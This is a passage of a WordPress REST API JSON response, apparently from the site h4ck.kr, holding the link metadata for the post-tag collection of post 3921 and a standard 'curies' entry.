y":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}